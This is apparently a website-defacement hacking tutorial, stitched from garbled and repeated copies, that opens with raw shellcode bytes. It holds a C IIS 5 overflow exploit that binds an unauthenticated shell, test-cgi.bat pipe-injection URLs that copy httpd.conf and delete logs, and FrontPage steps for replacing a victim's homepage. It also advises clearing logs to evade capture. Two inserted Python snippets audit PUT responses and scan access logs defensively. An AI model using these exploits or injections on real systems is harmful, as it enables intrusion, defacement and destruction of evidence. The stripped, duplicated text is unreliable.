x55xf0x33xc0xb4x04x50x6ax40xffx95x34xffxffxffx89

x85x30xffxffxffx90x33xdbx53x8dx85x2cxffxffxffx50

x53x53x53xffx75x9cxffx55xecx8bx85x2cxffxffxffx85

xc0x74x49x33xdbx53xb7x04x8dx85x2cxffxffxffx50x53

xffxb5x30xffxffxffxffx75x9cxffx55xe8x85xc0x74x6d

x33xc0x50xffxb5x2cxffxffxffxffxb5x30xffxffxffxff

x75xc0xffx55xccx83xf8xffx74x53xebx10x90x90x90x90

x90x90x6ax32xffx95x28xffxffxffxebx99x90x90x33xc0

x50xb4x04x50xffxb5x30xffxffxffxffx75xc0xffx55xc8

x83xf8xffx74x28x89x85x2cxffxffxffx33xc0x50x8dx85

x2cxffxffxffx50xffxb5x2cxffxffxffxffxb5x30xffxff

xffxffx75x90xffx55xe4x85xc0x74x02xebxb4xffx75xc4

xffx95x1cxffxffxffxffx75xc0xffx95x1cxffxffxffx6a

xffxffx95x18xffxffxff

char s1=POST HTTP11rn

char s2=Accept rn

char s4=Content-Type applicationx-www-

form-urlencodedrn

char s5=Transfer-Encoding

chunkedrnrn

char sc=0rnrnrn

char shellcodebuff[10248]

memset(shellcodebuff0x90sizeof

(shellcodebuff))

memcpy(ampshellcodebuff[sizeof(shellcodebuff)-

strlen(shellcode)-1]shellcodestrlen(shellcode))

shellcodebuff[sizeof(shellcodebuff)-1] = 0

char sendbuff[102416]

memset(sendbuff0102416)

sprintf(sendbuffsss HTTP11rnsHost

srnss10rnsrn4rnAAAArn4rnBBBBrns s1 destFile

shellcodebuff s2 destIP s4s 5 padsrcdatajmpaddr sc)

int sendlen=strlen(sendbuff)

(DWORD )strstr(sendbuffBBBB) = jmpaddr

(DWORD )strstr(sendbuffAAAA) = srcdata

result=send(ssendbuffsendlen0)

if(result == -1 )

puts(Send shellcode error)

return -1

memset(buff04096)

result=recv(sbuffsizeof(buff)0)

if(strstr(bufflthtmlgt) = NULL)

shutdown(s0)

closesocket(s)

puts(Send shellcode errorTry again)

return -1

shutdown(s0)

closesocket(s)

printf(nUse lttelnet s 1111gt to connect to the hostndestIP)

puts(If you cannot connect to the hosttry run this program again)

return 0

IMPLEMENTATION OF THE CODE

To implement the C code you must compile it and run Now you

must be wondering what is the use of this code Actually the C

code causes an overflow in IIS on Windows 2000 and commands

the system to bind a shell to the source Ip on port 1111 So once

the exploit works there will be a shell bind on port 1111 on the

target system To workout you must telnet the target IP into port

1111 through this you will be connected to the system without

any kind of authentication

Various Security Measures

Website defacement has become a terrible problem for IT

(Information Technology) based companies Everyday thousands

of websites are defaced Well even Government websites are

defaced for different reasons the most common reason is cyber

war Like in reality there are wars between two rival countries

similarly in wired world there are cyber wars

If you want to see the web attack archive visit the following site

httpdefacedalldasorg

Now some security measures for the system administrators

- First of all you must coordinate and organize your web root

with suitable directories What I mean to say is that you must

organize your files like images in an image directory one for

server side contents and so on so forth If you donrsquot configure your

web root properly then your web server will be prone to many

attacks

- You must be aware of the latest vulnerabilities visit these sites

httpwwwsecurityfocuscom

httpwwwpacketstormorg

httpwwwguininskicom

httpwwwinsecureorg

httpwwwsecuriteamcom

httpwwwslashdotorg

httpwwwtechnotroniccom

Well every web server is vulnerable but you must not fear you

must download the latest patches for the particular vulnerability

Well the last thing is that you must be able to predict the moves

of a malicious cracker or a script kiddie You need to know how a

cracker breaks into your site or web server you need to know the

motive behind the attack and you must think act and work like a

hacker and take the cracker out from the root

So this completes my tutorial on Defacing websites I hope you

have understood the involutions of web servers

Edit By S433D_ONLY_LINUX AND HACKFIRE TEAM

Page 3: Defacing Website

NOTE: Port 80 is the default HTTP port for web servers.

    Microsoft Telnet> telnet www.hackingtheworld.ilitehost.com 80
    GET / HTTP/1.1\r\n\r\n
    Host: server-software
    <enter>
    <enter>
    <enter>
    HTTP/1.1 403 Forbidden
    Date: Fri, 17 Mar 2006 13:00:20 GMT
    Server: Apache/1.3.22 (Win32)
    Connection: close
    Content-Type: text/html; charset=iso-8859-1

    <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
    <HTML><HEAD>
    <TITLE>403 Forbidden</TITLE>
    </HEAD><BODY>
    <H1>Forbidden</H1>
    You don't have permission to access / on this server.<P>
    <HR>
    <ADDRESS>Apache/1.3.22 Server at www.apache.org Port 80</ADDRESS>
    </BODY></HTML>

    Connection to host lost.

I have telnetted to www.hackingtheworld.ilitehost.com on port 80, so I get the above figure in my command prompt. Okay, I hope you have figured out what I mean: it is a mere telnet response. Okay, I will tell you what to do. You have to telnet to a web server or website on port 80.

NOTE: I have telnetted to the domain name; you can telnet to the IP address also.

So after telnetting to the web server name or the website you will get a blank screen. In the blank screen type in a request like GET / HTTP/1.1\r\n\r\n, then type something like Host: server-software, then press <enter> quite a few times until you get the server's response. The server will respond with its software information.

Examining the Web Server

If you are using Microsoft IIS (Internet Information Services), then you must have noticed that the default installation puts the website root in C:\Inetpub\wwwroot. Basically, all the directories served by the server software are called virtual directories. In a web server each virtual directory is given a different set of permissions: Read, Write, Execution of Scripts, and Execution of Executables such as DLLs and server-side pages like ASP, CGI, etc.

Now I am going to describe the methods of analyzing the directory permissions of a virtual directory residing on a web server.

READ ACCESS

Whenever you visit a website through your web browser you type in the domain name. Do you know what happens when you type in the domain name? When you type in the domain name and press enter, you are connected to port 80 (the HTTP port) of the IP address linked with the domain name.

For example:

You type in www.hackingtheworld.ilitehost.com in your web browser's address bar. The IP (Internet Protocol) address of this site is 72.29.65.4, so as soon as you press enter the URL (Uniform Resource Locator) is resolved to that IP address and the request goes to 72.29.65.4/index.html, index.php, index.asp, index.jsp or whatever index page is configured in the web server. Once you press enter you are taken to Hacking the World's official website. On the website you are able to read content from its wwwroot. If the wwwroot directory contains ASP, PHP or JSP, then those server-side pages are executed, and HTML is generated dynamically and passed to the browser (client) by IIS (server) or whichever web server is running. When you are able to read a document from a given directory, that signals that the directory is readable. Normally, directories containing database files are denied read access for security reasons.

WRITE ACCESS

I will explain the HTTP protocol concisely before going on to write access. HTTP is a component of the TCP/IP stack. It was designed with the intention of sharing files across the Internet. HTTP is the acronym of Hyper Text Transfer Protocol; the name itself describes it. Files can be uploaded to the server and downloaded from the server through the HTTP protocol.

NOTE: Files can be uploaded to the server and downloaded from the server through the HTTP protocol without the need for any type of authentication.

Well, this technique was employed years ago. Soon computer enthusiasts realized that this kind of technique was a huge security threat, so they developed new techniques to subdue the threat. Nowadays web servers are designed and configured to give write access only to selected virtual directories.

TIP: Try telnetting to a web server and find out some good information about the server and its behavior.

Now I am going to explain some commonly used commands supported by a web server.

GET: It is used by the browser (client) to request read access to a file residing on the server.

    Microsoft Telnet> telnet www.hackingtheworld.ilitehost.com 80
    Connected to www.hackingtheworld.ilitehost.com
    GET /index.html HTTP/1.1\r\n\r\n

Sidetrack: The HTML (Hyper Text Markup Language) source code of the index.html page residing on the server will be returned, or, if an ASP, PHP or any other server-side executable page is requested, the dynamically generated HTML page will be shown.

DEL: This is a command for deleting files on the web server. This command requires write access on the virtual directory where the file is to be deleted.

    Microsoft Telnet> telnet www.hackingtheworld.ilitehost.com 80
    Connected to www.hackingtheworld.ilitehost.com
    del /index.html HTTP/1.1\r\n\r\n

Sidetrack: Most probably you will get a 403 Forbidden error, as it is quite obvious that the wwwroot directory will never have write access.

PUT: It is used to create files on the server; it requires write access on the particular virtual directory where the file is to be created.

    Microsoft Telnet> telnet www.hackingtheworld.ilitehost.com 80
    Connected to www.hackingtheworld.ilitehost.com
    PUT /cc.txt HTTP/1.1\r\n\r\n

Sidetrack: Most probably you will get a 403 Forbidden error, as it is quite obvious that the wwwroot directory will never have write access.

ECHO: The publishing tool; it is the same command used in DOS (Disk Operating System) batch files. The output can be redirected.

    Microsoft Telnet> www.hackingtheworld.ilitehost.com 80
    Connected to www.hackingtheworld.ilitehost.com
    ECHO Site defaced by SB >> index.html HTTP/1.1\r\n\r\n

TIP: SB is the acronym of my name, Shubham Bhattacharya. When you are defacing a site you can also use the acronym of your name.

PROPFIND: PROPFIND is used as a request for directory surfing.

NOTE: On an IIS server it is used as an administrative tool for web server analysis.

    Microsoft Telnet> www.hackingtheworld.ilitehost.com 80
    Connected to www.hackingtheworld.ilitehost.com
    PROPFIND / HTTP/1.1
    Host: iis-server
    Content-Length: 0

Sidetrack: You will definitely get a 403 Forbidden error, as it is quite evident that the wwwroot will never have write access.

Well, you must be wondering how you can test the write access permission for a particular directory on an IIS server.

To test the write access permission for a particular directory on an IIS server, follow the steps given below.

- To test whether write access permission is enabled for anonymous web clients, telnet to the web server or the website on port 80 and make the following request:

    PUT /scripts/htwasp HTTP/1.1
    Host: iis-server
    Content-Length: 10 <enter><enter>

Once you make this request, the server should respond with a 100 Continue message:

    HTTP/1.1 100 Continue
    Server: Microsoft-IIS/5.0
    Date: Sun, 17 Feb 2006 10:53:00 GMT

On receiving the above, type 10 letters:

    XXXXXXXXXX

    HTTP/1.1 201 Created
    Server: Microsoft-IIS/5.0
    Date: Sun, 17 Feb 2006 10:56:08 GMT
    Location: http://iis-server/dir/my_file.txt
    Content-Length: 0
    Allow: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, LOCK, UNLOCK

If the server responds with this 201 Created response, then write permission is enabled.
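An added example, not part of this tutorial: a small Python helper for reading the reply a server gives to this PUT probe when you run it against your own IIS or Apache virtual directories. It parses the status line and headers of a raw response as captured in a telnet session, skips the interim 100 Continue, reports whether the directory accepted the write, and lists the methods in the Allow header that a public directory should not expose to anonymous clients. The sample responses are constructed from the transcripts in this section.

```python
"""Audit helper for the write-access probe described above.

Added example, not part of the original tutorial. Given the raw text a
server sent back after a PUT probe against one of your own virtual
directories, it reports whether the directory accepted the upload and
which risky methods the server advertises. Sample responses below are
constructed from the transcripts in this section.
"""

# Methods that create, delete, move or enumerate content on the server.
RISKY_METHODS = {"PUT", "DELETE", "COPY", "MOVE", "PROPFIND", "PROPPATCH",
                 "SEARCH", "LOCK", "UNLOCK", "MKCOL"}


def parse_response(raw):
    """Parse one HTTP/1.x response head into (status_code, headers).

    Accepts CRLF or LF line endings, as pasted from a telnet session;
    header names are lower-cased so lookups are case-insensitive.
    """
    head = raw.replace("\r\n", "\n").split("\n\n", 1)[0]
    lines = [ln for ln in head.split("\n") if ln.strip()]
    if not lines or not lines[0].startswith("HTTP/"):
        raise ValueError("not an HTTP response")
    parts = lines[0].split(None, 2)
    if len(parts) < 2 or not parts[1].isdigit():
        raise ValueError("malformed status line: %r" % lines[0])
    headers = {}
    for line in lines[1:]:
        if ":" not in line:
            continue  # stray text such as an <enter> marker in a transcript
        name, value = line.split(":", 1)
        headers[name.strip().lower()] = value.strip()
    return int(parts[1]), headers


def final_response(raw):
    """Return (status, headers) of the last response in a captured stream.

    IIS answers a PUT carrying Content-Length with '100 Continue' first and
    gives the real verdict (201, 403, ...) only after the body; skip 1xx.
    """
    status, headers = parse_response(raw)
    while 100 <= status < 200:
        parts = raw.replace("\r\n", "\n").split("\n\n", 1)
        if len(parts) < 2 or not parts[1].strip():
            break  # stream ended after the 1xx; report what we have
        raw = parts[1]
        status, headers = parse_response(raw)
    return status, headers


def allowed_methods(headers):
    """Methods listed in the Allow header, upper-cased, as a set."""
    return {m.strip().upper()
            for m in headers.get("allow", "").split(",") if m.strip()}


def audit_put_probe(raw):
    """Classify the server's reply to a PUT probe.

    write_enabled is True when the directory accepted the upload
    (200/201/204); needs_auth is True for 401, i.e. writes are gated by
    a login rather than open to anonymous clients.
    """
    status, headers = final_response(raw)
    return {
        "status": status,
        "server": headers.get("server", ""),
        "write_enabled": status in (200, 201, 204),
        "needs_auth": status == 401,
        "risky_methods": sorted(allowed_methods(headers) & RISKY_METHODS),
    }


# Constructed responses modelled on the transcripts in this section.
RESPONSE_WRITE_OK = (
    "HTTP/1.1 201 Created\r\n"
    "Server: Microsoft-IIS/5.0\r\n"
    "Date: Sun, 17 Feb 2006 10:56:08 GMT\r\n"
    "Location: http://iis-server/dir/my_file.txt\r\n"
    "Content-Length: 0\r\n"
    "Allow: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, COPY, MOVE, PROPFIND, "
    "PROPPATCH, SEARCH, LOCK, UNLOCK\r\n\r\n"
)
RESPONSE_CONTINUE_THEN_CREATED = (
    "HTTP/1.1 100 Continue\r\n"
    "Server: Microsoft-IIS/5.0\r\n"
    "Date: Sun, 17 Feb 2006 10:53:00 GMT\r\n\r\n"
) + RESPONSE_WRITE_OK
RESPONSE_FORBIDDEN = (
    "HTTP/1.1 403 Forbidden\r\n"
    "Date: Fri, 17 Mar 2006 13:00:20 GMT\r\n"
    "Server: Apache/1.3.22 (Win32)\r\n"
    "Connection: close\r\n"
    "Content-Type: text/html; charset=iso-8859-1\r\n\r\n"
    "<HTML><BODY><H1>Forbidden</H1></BODY></HTML>\r\n"
)

if __name__ == "__main__":
    for raw in (RESPONSE_CONTINUE_THEN_CREATED, RESPONSE_FORBIDDEN):
        print(audit_put_probe(raw))
```

A 201 from a directory that is meant to be read-only is the finding to act on; a 401 means the write is at least gated by a login.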

EXECUTION ACCESS

Server-side pages like ASP, PHP, JSP or DLLs are used in highly advanced, database-driven dynamic websites, which generate the HTML dynamically and send it to the client (web browser). These server-side pages and other executables, including DLL and EXE files, need execution privileges in the virtual directory where they are kept.

NOTE: DLL, EXE etc. need execution privileges; they are kept in a single virtual directory.

DIRECTORY SURFING

It has often been seen that web servers, or to be more specific the virtual directories of web servers, are configured to provide directory surfing access to all clients, or to special clients through proper authentication. Directory browsing means that you can list the files and folders present in a virtual directory just as you see them on your standalone system. Most web server administrators turn off this feature, but exploit code can be used to get a directory listing of the virtual directory.

EXPLOIT FOR DIRECTORY LISTING IN APACHE

If you are not familiar with Apache, then let me give you a brief description. Apache is a server in which you configure your web server using commands and scripts. These scripts and commands are kept in the httpd.conf file, in the C:\Apache Group\Apache\conf folder in a default Apache installation on a typical Windows system. This file contains all the settings of the web server, and if we get our hands on this file then we get to know all the settings of the web server, including the location of log files, directory permissions, write access, authentication levels, etc.

So now let's get on with the exploit. As we know, Apache is the most preferred web server. This web server has a batch file in its cgi-bin directory. This batch file is named test-cgi.bat. The purpose of the batch file is to test the privileges of the cgi-bin directory.

NOTE: The cgi-bin directory contains all the CGI and Perl scripts.

It is quite obvious that the cgi-bin virtual directory has execution permissions. These conditions are exploited to carry out pernicious attacks. The batch file in the Apache web server is run as a DOS (Disk Operating System) execution: a DOS shell is spawned to run it. Now we can use the | (pipe) character along with the batch file to execute commands on the remote server.

NOTE: If you don't know how to type the | (pipe) character, then don't worry. To type the pipe character press Alt+; the character is just beside your backspace key.

So the attack URL will be like this:

    http://www.target.com/cgi-bin/test-cgi.bat|copy+conf\httpd.conf+htdocs\httpd.conf

Through the above URL I have copied the httpd.conf file from the conf directory. The conf directory mostly does not have read access from the Apache web root, that is the htdocs virtual folder. Now we can easily download the httpd.conf file using the following URL, since the copy now resides in the Apache web root:

    http://target.com/httpd.conf

Through this method you will get the httpd.conf file, and through the httpd.conf file you can get some worthwhile information about the web server.

Inspecting known vulnerabilities

Generally websites are defaced and hacked using vulnerabilities related to the server software or the operating system running the server software. Most 'hackers' deface websites using vulnerabilities. Please note I am talking about hackers, not script kiddies who deface websites using uncanny software. So you must know what a vulnerability is; if you don't know, then let me tell you. A vulnerability is an existing flaw or defect in the software architecture which allows a hacker or cracker to take control of the system or issue arbitrary system commands to the server. In every piece of software, application or tool vulnerabilities persist.

    http://www.securityfocus.com
    http://www.packetstorm.org
    http://www.guininski.com
    http://www.insecure.org
    http://www.securiteam.com
    http://www.slashdot.org
    http://www.technotronic.com

The above sites contain the latest vulnerabilities with exploit code. Even if you are an elite or a professional, you will find the information useful.

Working with Exploits

Well, I must say this is the most exciting part of this tutorial. Okay, so www.victim.com is the target site. Through the methods I have explained earlier in the tutorial we have found out that the website is running on Microsoft IIS server software. So it is time to find some vulnerability. I am using the Acunetix Web Security Scanner to scan for vulnerabilities. You must know programming languages like Perl or C, or socket programming; this is essential because through this you will be able to compile the exploits. So once you find a vulnerability, try exploiting it by executing it in your client (browser).

MICROSOFT FRONTPAGE EXTENSIONS EXPLOIT

This is one of the methods of website defacement using the Microsoft Web Publishing Wizard. Using this method one can deface websites having FrontPage Server Extensions. Using the Microsoft Web Publishing Wizard one can replace pages on sites running FrontPage Server Extensions.

Follow the steps given below to execute this exploit.

Telnet to the target website or web server on port 80:

    C:\>telnet www.victim.com 80

You will get a blank screen. Type GET and continue pressing enter till the web server responds to your request:

    GET <ENTER><ENTER>

NOTE: Web servers running on IIS have FrontPage Extensions enabled by default.

After pressing enter you will get the following:

    HTTP/1.1 400 Bad Request
    Server: Microsoft-IIS/5.0
    Date: Thu, 17 Feb 2006 04:18:45 GMT
    Content-Type: text/html
    Content-Length: 87

Once you get the HTTP Bad Request you have to search for the homepage. Most sites have the default homepage as one of:

    http://www.victimserver.com/main.asp
    http://www.victimserver.com/index.html
    http://www.victimserver.com/index.htm
    http://www.victimserver.com/index.asp
    http://www.victimserver.com/main.htm
    http://www.victimserver.com/default.htm
    http://www.victimserver.com/default.asp
    http://www.victimserver.com/default.html

Keep trying all possible FrontPage extensions until the page loads. If the extension doesn't exist, it will give a 404 error.

Let us say you have found the homepage as www.victim.com/index.html, so design the page which you want to upload, or modify the homepage. Here the homepage is index.html; once you have designed the page or modified it, save it as index.html.

Now open the Web Publishing Wizard and follow the steps given below:

- Open Microsoft Web Publishing Wizard.

- Now browse to the file that you are going to upload. Here index.html is the file which we are going to upload.

- Now you get a screen where you have to name the web server. Type in anything and click on Advanced.

- Select the service provider from the drop-down box. This is nothing but the kind of upload it is going to do. Since your motive is to deface the site, select the FrontPage Extended Web option, since this method of defacing works only for FrontPage-enabled sites.

- Type the URL of the victim server homepage in the given box; here it is www.victim.com/index.html.

- Here specify the URL that you type in the web browser to access the victim server website.

- Select the connection method that you use to access the internet.

- Click Finish. Voila, you have successfully replaced the victim's homepage with yours.

Overworking known vulnerabilities to break into a server

Before going deep into vulnerabilities you must know some exploit code. I am going to present some exploit code written in the most powerful programming language, C.

    // Windows 2000 Server Exploit, by CHINANSL Security Team
    // Tested on Windows 2000 Chinese Version, IIS 5.0, not patched.
    // Warning: THIS PROGRAM WILL ONLY TEST
    // CHINANSL Technology CO., LTD   http://www.chinansl.com
    // keji@chinansl.com
    // use MS VC++ to compile this piece of code

    #include "stdafx.h"
    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
    #include <windows.h>
    #pragma comment(lib, "Ws2_32")

    int main(int argc, char *argv[])
    {
        if (argc != 4) {
            printf("%s ip port aspfilepath\n\n", argv[0]);
            printf(" ie. %s 127.0.0.1 80 /iisstart.asp\n", argv[0]);
            puts(" programed by keji@chinansl.com");
            return 0;
        }

        DWORD srcdata = 0x01e2fb1c - 4;      // 0x00457474
        // address of SHELLCODE
        DWORD jmpaddr = 0x00457494;          // 0x77ebf094, 0x01e6fcec,
                                             // "\x1c\xfb\xe6\x01", "\x0c\xfb\xe6\x01"
        char *destIP = argv[1];
        char *destFile = argv[3];
        int webport = atoi(argv[2]);
        char *pad = "\xcc\xcc\xcc\xcc";      // "ADPA", "\x02\x02\x02\x02", "PADP", 16 bytes

        WSADATA ws;
        SOCKET s;
        long result = 0;

        if (WSAStartup(0x0101, &ws) != 0) {
            puts("WSAStartup() error");
            return -1;
        }

        struct sockaddr_in addr;
        addr.sin_family = AF_INET;
        addr.sin_port = htons(webport);
        addr.sin_addr.s_addr = inet_addr(destIP);

        s = socket(AF_INET, SOCK_STREAM, 0);
        if (s == -1) {
            puts("Socket create error");
            return -1;
        }
        if (connect(s, (struct sockaddr *)&addr, sizeof(addr)) == -1) {
            puts("Cannot connect to the specified host");
            return -1;
        }

        char buff[4096];
        // The listing gives the payload here as a "\x55\x8b\xec..." string of
        // several hundred bytes (the bind shell on port 1111). The copy on this
        // page is garbled and the bytes are not reproduced.
        char *shellcode = "";

        char *s1 = "POST / HTTP/1.1\r\n";
        char *s2 = "Accept: */*\r\n";
        char *s4 = "Content-Type: application/x-www-form-urlencoded\r\n";
        char *s5 = "Transfer-Encoding: chunked\r\n\r\n";
        char *sc = "0\r\n\r\n\r\n";

        char shellcodebuff[1024 * 8];
        memset(shellcodebuff, 0x90, sizeof(shellcodebuff));
        memcpy(&shellcodebuff[sizeof(shellcodebuff) - strlen(shellcode) - 1],
               shellcode, strlen(shellcode));
        shellcodebuff[sizeof(shellcodebuff) - 1] = 0;

        char sendbuff[1024 * 16];
        memset(sendbuff, 0, 1024 * 16);
        // nine %s conversions but eleven arguments, reproduced as in the listing
        sprintf(sendbuff,
                "%s%s%s HTTP/1.1\r\n%sHost: %s\r\n%s%s10\r\n%s\r\n4\r\nAAAA\r\n4\r\nBBBB\r\n%s",
                s1, destFile, shellcodebuff, s2, destIP, s4, s5, pad, srcdata, jmpaddr, sc);
        int sendlen = strlen(sendbuff);
        *(DWORD *)strstr(sendbuff, "BBBB") = jmpaddr;
        *(DWORD *)strstr(sendbuff, "AAAA") = srcdata;

        result = send(s, sendbuff, sendlen, 0);
        if (result == -1) {
            puts("Send shellcode error");
            return -1;
        }

        memset(buff, 0, 4096);
        result = recv(s, buff, sizeof(buff), 0);
        if (strstr(buff, "<html>") != NULL) {
            shutdown(s, 0);
            closesocket(s);
            puts("Send shellcode error! Try again");
            return -1;
        }

        shutdown(s, 0);
        closesocket(s);
        printf("\nUse <telnet %s 1111> to connect to the host\n", destIP);
        puts("If you cannot connect to the host, try run this program again");
        return 0;
    }

The above code is called exploit code; such code is written in powerful programming languages like C, Perl or sometimes Java. Exploit code is written according to the vulnerability. These vulnerabilities were discovered in the past, and nowadays server software and operating systems are patched for them. So you can't just execute exploit code to break into a server; you must overwork an exploit code so that it works according to your needs. One more thing I must mention is that you must keep yourself updated with the latest vulnerabilities by visiting the sites that I have mentioned earlier in the tutorial. Well, I think it's better that you code your own exploit in Perl or C in order to break into websites.

NOTE: I am talking about high-profile websites; I am not talking about lame websites coded in Notepad.

Keeping yourself safe

Well, you must be familiar with server software like Apache, Microsoft IIS, etc. So you must know about the log files, which record each and every request made to the server. As they record everything, system administrators will have no problem catching the malicious cracker or script kiddie, as the log file will have the IP (Internet Protocol) address, and through the IP address you can trace the cracker or the script kiddie.

NOTE: Read my tutorial on Gathering Information of Remote Host.

TIP: If you do not want to get busted you must clear the log files after you break into a web server.

CLEARING LOGS

You must clear the logs in order to save yourself from getting busted. So you can use a cross site scripting vulnerability to clear the log files. You can do this by executing the following URL:

    http://www.target.com/cgi-bin/test-cgi.bat|DEL+log

NOTE: The above URL can be used on Apache server software.
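The access log the text refers to is also where a defender finds this activity. Added example, not part of the tutorial: it scans constructed Apache-style access log lines for the request patterns described above (write and WebDAV methods against content, the test-cgi.bat pipe injection, a copied httpd.conf fetched from the web root, and the DEL variant aimed at the logs) and groups the findings by client address. The hostnames and addresses in the sample lines are made up.

```python
"""Detection pass over web server access logs.

Added example, not from the original tutorial. Scans Apache combined-format
access log lines for the request patterns this tutorial describes and groups
the findings by client address, the field the text says identifies the source.
The sample lines below are constructed for the example, not real traffic.
"""
import re
from urllib.parse import unquote

# Apache "combined"/"common" format up to the status and size fields.
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<when>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)(?: (?P<proto>HTTP/\d\.\d))?" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Methods that write, delete, move or enumerate content; none of them should
# be reachable anonymously on a public virtual directory.
WRITE_METHODS = {"PUT", "DELETE", "COPY", "MOVE", "PROPFIND", "PROPPATCH",
                 "MKCOL", "LOCK", "UNLOCK", "SEARCH"}


def classify_request(method, target):
    """Return a list of finding tags for one request line, empty if benign."""
    findings = []
    # Decode %XX escapes (a client may send %7C for the pipe) and treat '+'
    # as the space it stands for in the URLs shown in this tutorial.
    path = unquote(target).replace("+", " ").lower()
    if method in WRITE_METHODS:
        findings.append("write-method:" + method)
    # Apache/Win32 test-cgi.bat: a '|' in the URL hands the rest to a DOS shell.
    if "test-cgi.bat" in path and "|" in path:
        findings.append("cgi-pipe-injection")
        if re.search(r"\bdel\b", path):
            findings.append("log-deletion-attempt")
    # The server's own configuration being served out of the document root.
    if path.split("?", 1)[0].rstrip("/").endswith("httpd.conf"):
        findings.append("config-file-request")
    return findings


def scan_log(lines):
    """Yield (client, method, target, status, findings) for suspicious lines."""
    for line in lines:
        m = LOG_RE.match(line)
        if m is None:
            continue  # unparseable line; a production job would count these
        findings = classify_request(m["method"], m["target"])
        if findings:
            yield (m["client"], m["method"], m["target"],
                   int(m["status"]), findings)


def findings_by_client(lines):
    """Aggregate finding tags per client address."""
    summary = {}
    for client, _method, _target, _status, findings in scan_log(lines):
        summary.setdefault(client, []).extend(findings)
    return summary


# Constructed sample log; addresses are taken from the documentation ranges.
SAMPLE_LOG = [
    '203.0.113.5 - - [17/Feb/2006:10:56:08 +0000] "PUT /scripts/htwasp HTTP/1.1" 201 0',
    '203.0.113.5 - - [17/Feb/2006:10:57:41 +0000] "GET /cgi-bin/test-cgi.bat|copy+conf/httpd.conf+htdocs/httpd.conf HTTP/1.0" 200 512',
    '203.0.113.5 - - [17/Feb/2006:10:58:02 +0000] "GET /httpd.conf HTTP/1.1" 200 9012',
    '203.0.113.5 - - [17/Feb/2006:11:02:19 +0000] "GET /cgi-bin/test-cgi.bat|DEL+*.log HTTP/1.0" 200 0',
    '198.51.100.9 - - [17/Feb/2006:11:03:00 +0000] "GET /index.html HTTP/1.1" 200 2326',
    '198.51.100.9 - - [17/Feb/2006:11:03:01 +0000] "PROPFIND / HTTP/1.1" 403 0',
]

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
```

Because the log is the evidence an attacker tries to delete, ship it off the web server (syslog, a log collector) as it is written rather than relying on the local copy.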

In the case of IIS on Windows 2000 you can use the following method to get a DOS shell through telnet.

The CHINANSL code listed above under "Overworking known vulnerabilities" exploits a buffer overflow in IIS 5 on Windows 2000 Server, opens port 1111 and binds a shell to it. If the exploit is successful, then all you have to do is use telnet to connect to port 1111 of the target and the system is yours.


IMPLEMENTATION OF THE CODE

To implement the C code you must compile it and run it. Now you must be wondering what the use of this code is. The C code causes an overflow in IIS on Windows 2000 and commands the system to bind a shell on port 1111. So once the exploit works there will be a shell bound to port 1111 on the target system. To make use of it you must telnet to the target IP on port 1111; through this you will be connected to the system without any kind of authentication.

Various Security Measures

Website defacement has become a terrible problem for IT (Information Technology) based companies. Every day thousands of websites are defaced. Even government websites are defaced, for different reasons; the most common reason is cyber war. Just as in reality there are wars between two rival countries, similarly in the wired world there are cyber wars.

If you want to see the web attack archive, visit the following site:

    http://defaced.alldas.org

Now some security measures for the system administrators:

- First of all you must coordinate and organize your web root with suitable directories. What I mean to say is that you must organize your files: images in an image directory, one directory for server-side content, and so on and so forth. If you don't configure your web root properly then your web server will be prone to many attacks.

- You must be aware of the latest vulnerabilities; visit these sites:

    http://www.securityfocus.com
    http://www.packetstorm.org
    http://www.guininski.com
    http://www.insecure.org
    http://www.securiteam.com
    http://www.slashdot.org
    http://www.technotronic.com

Well, every web server is vulnerable, but you must not fear; you must download the latest patches for the particular vulnerability.

The last thing is that you must be able to predict the moves of a malicious cracker or a script kiddie. You need to know how a cracker breaks into your site or web server, you need to know the motive behind the attack, and you must think, act and work like a hacker and take the cracker out from the root.

So this completes my tutorial on defacing websites. I hope you have understood the involutions of web servers.

Edit By S433D_ONLY_LINUX AND HACKFIRE TEAM

Page 4: Defacing Website

ltBODYgtltHTMLgt

Connection to host lost

I have telnetted wwwhackingtheworldilitehostcom into port 80

so I get the above figure in my command prompt

Okay I hope you have figured out what I mean It is mere telnet

response Okay I will tell you what to do you have to telnet a web

server or website into port 80

NOTE I have telnetted the domain name you can telnet the IP

address also

So after telnetting the web server name or the website you will

get a blank screen So in the blank screen type in some requests

like GET HTTP11rnrn then type something like

Hostserver-software then press ltentergt quite a few times until

you get the serverrsquos response The server will respond with its

software information

Examining the Web Server

If you are using Microsoft IIS (Internet Information service) then

you must have noticed that the default installation contains the

website root in CInetpubwwwroot Basically all the directories

of server softwares are called as virtual directories Actually in a

web server each virtual directory is provided with different type

of permissions Permissions like Read Write Execution of Scripts

and Execution of Executable like Dll and server side pages like

ASP CGI etc

Now I am going to describe the methods of analyzing the

directory permission of a virtual directory residing in a web server

READ ACCESS

Whenever you visit a website through your web browser you type

in the domain name Do you know what happens when you type in

the domain name Actually when you type in the domain name

and press enter you are connected to port 80 (HTTP port) of the

IP address linked with the domain name

For Example

You type in wwwhackingtheworldilitehostcom in your web

browserrsquos address bar The IP (Internet Protocol) address of this

site is 7229654 so as soon as you press enter the URL

(Uniform Resource Locator) is redirects the IP address to

7229654indexhtml indexphp indexasp indexjsp or

whatever the index page is configured in the web server Now

once you press enter you will be redirected to Hacking the

Worldrsquos official website In the website you will be able to read

contents from its wwwroot If the wwwroot directory contains

ASP PHP or JSP then those server side pages are executed and

HTML is generated and passed to the browser (client) by IIS

(server) or any web server dynamically When you are able to read

a document from a given directory then it signals that the

directory is readable Normally it has been seen that directories

containing databases files are forbidden with read access for

security reasons

WRITE ACCESS

I will explain HTTP protocol concisely before going to Write

Access Well HTTP is a component of TCPIP stack It was

configured and formulated with the connotation of sharing files

across the Internet HTTP is the acronym of Hyper Text Transfer

Protocol The name itself indicates the description Files can be

uploaded to the server and downloaded from the server through

the HTTP protocol

NOTE Files can be uploaded to the server and downloaded from

the server through the HTTP protocol without the need of any type

of authentication

Well this was technique was employed and executed years ago

Soon computer enthusiaists realized that this kind of technique

was a huge security threat So they developed new techniques to

subdue the security threat Nowadays web servers are designed

and configured as such to give write access to only selected virtual

directories

